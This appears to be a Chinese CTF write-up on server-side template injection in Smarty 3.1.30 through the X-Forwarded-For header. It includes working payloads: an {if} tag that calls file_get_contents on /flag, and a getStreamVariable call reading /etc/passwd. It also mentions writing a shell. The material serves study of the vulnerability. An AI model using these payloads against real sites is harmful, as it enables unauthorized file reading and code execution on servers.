題目提供了一個讀取XFF頭的api ,頁面最下方有Build With Smarty的字樣,可以確定是用Smarty引擎寫的.
基本上可以確定該頁面存在SSTi的可能性
將xff頭從127.0.0.1改為127.0.0{1 2}出現如下結果
ssti無疑了
最終payload是
X-Forwarded-For: {if var_dump(file_get_contents('/flag')) }{/if }
#Smarty是基於PHP開發的,對於Smarty的SSTI的利用手段與常見的flask的SSTI有很大區別。
一般情況下輸入{$smarty.version}就可以看到回傳的smarty的版本號碼。這個題目的Smarty版本是3.1.30
Smarty支援使用{php}{/php}標籤來執行被包裹其中的php指令,最常規的思路自然是先測試該標籤。但就該題目而言,使用{php}{/php}標籤會報錯誤:
#在Smarty3的官方手冊裡有以下描述:
Smarty已經廢棄{php}標籤,強烈建議不要使用。在Smarty 3.1,{php}僅在SmartyBC中可用。
該題目使用的是Smarty類,所以只能另尋它路。
官方手冊這樣描述這個標籤:
#{literal}可以讓一個模板區域的字元原樣輸出。這常用於保護頁面上的Javascript或css樣式表,避免因為Smarty的定界符而錯被解析。
那麼對於php5的環境我們就可以用
<script language="php">phpinfo();</script>
來實作PHP程式碼的執行,但這題的題目環境是PHP7,這種方法就失效了。
透過self取得Smarty類別再呼叫其靜態方法實作檔案讀寫被網路上很多文章採用。
Smarty類別的getStreamVariable方法的程式碼如下:
public function getStreamVariable($variable) { $_result = ''; $fp = fopen($variable, 'r+'); if ($fp) { while (!feof($fp) && ($current_line = fgets($fp)) !== false) { $_result .= $current_line; } fclose($fp); return $_result; } $smarty = isset($this->smarty) ? $this->smarty : $this; if ($smarty->error_unassigned) { throw new SmartyException('Undefined stream variable "' . $variable . '"'); } else { return null; } }
可以看到這個方法可以讀取一個檔案並回傳其內容,所以我們可以用self來取得Smarty物件並呼叫這個方法,很多文章裡給的payload都形如:{self::getStreamVariable("file:///etc/passwd")}。然而使用這個payload會觸發報錯如下:
Fatal error: Uncaught --> Smarty Compiler: Syntax error in template "string: Current IP:{self::getStreamVariable('file:///etc/passwd')}" static class 'self' is undefined or not allowed by security setting <-- thrown in /var/www/html/smarty/ libs/sysplugins/smarty_internal_templatecompilerbase.phpon line 12
可見這個舊版Smarty的SSTI利用方式並不適用於新版本的Smarty。而且在3.1.30的Smarty版本中官方已經把該靜態方法刪除。對於那些文章提到的利用 Smarty_Internal_Write_File 類別的writeFile方法來寫shell也因為同樣的原因無法使用。
{if}標籤
官方文件中看到這樣的描述:
Smarty的{if}
條件判斷和PHP的if 非常相似,只是增加了一些特性。每個{if}
必須有一個配對的{/if}
. 也可以使用{else}
和{elseif}
.全部的PHP條件式和函數都可以在if內使用,如||, or, &&, and, is_array(), 等等
既然全部的PHP函數都可以使用,那麼我們是否可以利用此來執行我們的程式碼呢?
如同開頭所說的
透過getshell之後的檔案讀取,本題引發SSTI的程式碼簡化後如下:
display("string:".$ip); }可以看到這裡使用字串取代smarty模板,導致了注入的Smarty標籤被直接解析執行,產生了SSTI。
以上是Smarty SSTi怎麼用的詳細內容。更多資訊請關注PHP中文網其他相關文章!